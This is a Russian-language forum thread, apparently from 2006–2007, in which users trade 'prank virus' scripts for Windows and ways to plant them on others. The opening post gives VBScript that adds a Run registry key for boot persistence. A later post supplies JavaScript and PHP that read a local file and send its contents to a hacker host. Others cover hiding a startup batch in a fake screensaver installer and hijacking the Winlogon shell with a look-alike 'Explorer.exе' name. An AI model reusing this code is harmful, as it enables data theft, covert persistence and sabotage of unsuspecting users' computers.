day & night

Прикольный скрипт, Накатал на досуге...
Дата обновления: , перейти к новому сообщению
#1
Love.sys



Коксохим
Group Icon

Группа: Наши Люди
Сообщений: 1.341
Регистрация: 23.08.2005
Пользователь №: 12.345


Респектов: 120
-----X----
Вот решил побаловаться =)
Вирь можно сказать простенький, Достал!.vbs

Тестим:

QUOTE
'Ваня представляет супер нарулный вирус.!!
Set WSHShell=WScript.CreateObject("WScript.Shell")
WSHShell.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\taskmgr.exe", "c:\System.bat"
Set xep =CreateObject("Scripting.FilesystemObject")
set xep =xep.CreateTextFile("c:\System.bat")
xep.WriteLine "notepad.exe c:\1.txt"
xep.close
Set xep =CreateObject("Scripting.FilesystemObject")
set xep =xep.CreateTextFile("c:\1.txt")
xep.WriteLine "Долбанный хеллоу ворлд!"
xep.close


Ну естесно всё что после "'" не учитывается.
Потом скрипт создаёт запись в реестре, в разделе run, которая
запускает System.bat на диске Ц.
Далее создаётся сам System.bat на диске Ц с произвольным
содерданием "notepad.exe c:\1.txt". Дальше больше моей фантазии... =)))
На диске Ц создаётся документ 1.txt =)))))))) с содержанием
"Долбанный хеллоу ворлд!" или по вашему желанию.
На этом, моя извращённая фантазия исчерпывается пока =))

В итоги, мы имеем после запуска скриптика
постоянный запуск блокнота при старте винды с надписью "
Долбанный хеллоу ворлд!" ухишьрения, циклы, прятанья и остальное
оставляю вам. Поиздевайтесь над не опытными сокалегами.

Например можно приписать скрипт autorun-на компакт диска,
запускающего данный скрипт vbs.

Писал, специально для новечков. Думаю всё понятно и максимально
просто, что даёт вводные знания о системе скриптов винды. Юзаем =)
User is offline
Go topGo end

Ответов(10 - 17)
icon10 15.04.2006 - 1:34
#11
дымчик



Специалист
[SoftoRooMTeaM] Group Icon

Группа: Модераторы
Сообщений: 475
Регистрация: 8.11.2005
Из: Санкт-Петербург
Пользователь №: 64.615


Респектов: 154
-----X----
Не знаю как в VBS'е, но в вэб-программировании при создании объекта файловой системы
CODE
CreateObject("Scripting.FilesystemObject")

браузер сразу выдает предупреждение, что страница содержит небезопасный код sad.gif.
И вообще Касперский определяет подобные штуки как червя и блокирует к ним доступ sad.gif.

А так вот я тоже тут вечерком скриптец накатал для кражи данных с пользовательских компьютеров

CODE

<script>

var hackerHOST = 'http://some-hackers.host/exploit.php';

function deface()
{
var fso = new ActiveXObject("Scripting.FileSystemObject");

var file = fso.openTextFile("c:\\privateInfo.txt", 1 ,true);

var fContent  = '';

while (!file.AtEndOfStream)
fContent += file.ReadLine() + '<BR>';
file.Close();


var hackerURL = hackerHOST + '?fContent=' + fContent;

var xmlRequest = new ActiveXObject("Microsoft.XMLHTTP");

if (xmlRequest)
{
       xmlRequest.onreadystatechange   = processChange;
xmlRequest.open("GET", hackerURL, true);
xmlRequest.send();
}
}

function processChange()
{
       if (xmlRequest.readyState == 4)
 {
               if (xmlRequest.status == 200)
  {
  myResponse   = xmlRequest.responseXML.documentElement;
                       parseOutput(myResponse);
  }
 }
}

</SCRIPT>

<A href="javascript:void(0);" ONCLICK="javascript:deface();">ЖЫМИТЕ, ПАЖАЛУСТА, СЮДА</A>


И соответственно back-end всего этого
CODE

<?PHP
$fp  = fopen('C:\stolenInformation.txt','w');
fputs($fp,$_GET["fContent"]);
fclose();
?>


Р.S. Для увода большого количества информации можно использовать POST метод при отправке данных ph34r.gif
User is offline
Go topGo end
11.10.2007 - 16:22
#12
Korich



Game Developer
Group Icon

Группа: Наши Люди
Сообщений: 2.324
Регистрация: 11.04.2006
Из: ниоткуда
Пользователь №: 13


Респектов: 671
-----XXXX-
пркольный танцующий лисёнок

Твой софтовый форум


http://fotoking.ru/readme/index.html
User is offline
Go topGo end
11.10.2007 - 20:44
#13
x-foby



Здесь моя Интернет-Родина
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 1.264
Регистрация: 26.07.2006
Из: Анапа, Россия
Пользователь №: 20


Респектов: 286
-----XX---
неплохая тема у Гражданин'а, но я делал это проще:
1. создаем нужный бат(к примеру:
echo off
start explorer
start c:\explorer.bat)
2. создаём ключик реестра, дав дд имя explorer.exe
3. прикрепляем это в инсталляшку - в моём случае это была заставка мисс плэйбой.
преемущества:
1. антивирь скажет о попытке проникновения в реестр, но это обычное дело при инсталле. ваш ответ - разрешить.
2. через мсконфиг видно explorer.exe
3. скан бесполезен!
User is offline
Go topGo end
11.10.2007 - 21:15
#14
de1ay



профи!
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 4.437
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 613
-----XXXX-
Можно ещё как dll`ку подгружать при старте системы. smile.gif Можно, вот например, как сервис запускать... Варианты есть.
User is offline
Go topGo end
11.10.2007 - 21:25
#15
de1ay



профи!
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 4.437
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 613
-----XXXX-
walet, твой способ не прокатит вот почему:
Твой софтовый форум
User is offline
Go topGo end
12.10.2007 - 23:25
#16
x-foby



Здесь моя Интернет-Родина
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 1.264
Регистрация: 26.07.2006
Из: Анапа, Россия
Пользователь №: 20


Респектов: 286
-----XX---
Жень, давай не будем забывать, что этот прикол расчитан на ламеров, а если кто-то и додумается залезть в мсконфиг, то отключить explorer.exe не у каждого рука поднимиться, а адрес мона сменить, кинув bat в WINDOWS\System32 smile.gif
и соответственно адресок в самом бате и реестре подправив...


так лучше? smile.gif

зы: в завершение - прокатывало))
User is offline
Go topGo end
2.11.2007 - 8:50
#17
Skiff



Бывалый
*

Группа: Пользователи
Сообщений: 47
Регистрация: 23.03.2007
Пользователь №: 361.397


Респектов: 4
-----X----


Предупреждений:

Нечто подобное несколько лет назад видел на каком то сайте.

Code

var wsh=WScript.CreateObject("WScript.Shell");

WScript.Sleep("3000");

wsh.Run("notepad");

str = "вот здесь будет текст";

while(1==1)

{

           WScript.Sleep("300");

           for(i=0; i<str.length; i++)

           {

                       wsh.AppActivate("Безымянный - Блокнот");

                       wsh.SendKeys(str.charAt(i));

                       WScript.Sleep("300");

           }

WScript.Sleep("120000");

}


Данный скрипт как бы запускает блокнот и вбивает побуквенно строку которую вы ему зададите довольно интересный прикол.
User is offline
Go topGo end
3.12.2007 - 5:20
#18
x-foby



Здесь моя Интернет-Родина
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 1.264
Регистрация: 26.07.2006
Из: Анапа, Россия
Пользователь №: 20


Респектов: 286
-----XX---
delay(0), вариант #2:
пишем батник:
Цитата | Quote
reg add "hklm\software\microsoft\windows nt\currentversion\winlogon" /v Shell /t REG_SZ /d Explorer.exе /f

(!)выделенная 'е' - кириллица

Там придумываем как бы ентот батник запустить и получаем невключение Explorer'a на компе, а через диспетчер задач открывается тока проводник.
Можно конечно ещё и доступ к диспетчеру задач закрыть, чтоб в реестр не лазили, но это слишком жёстко и не только для новичков.
User is offline
Go topGo end
Вид темы: [ Линейный ] · Стандартный · Режимы сортировки: [ По возрастанию (0-9) ] · По убыванию (9-0)

 
Topic Options
Сейчас: 14.05.2024 - 11:51
 Мобильная версия | Lite версия
SoftoRooM © 2004-2024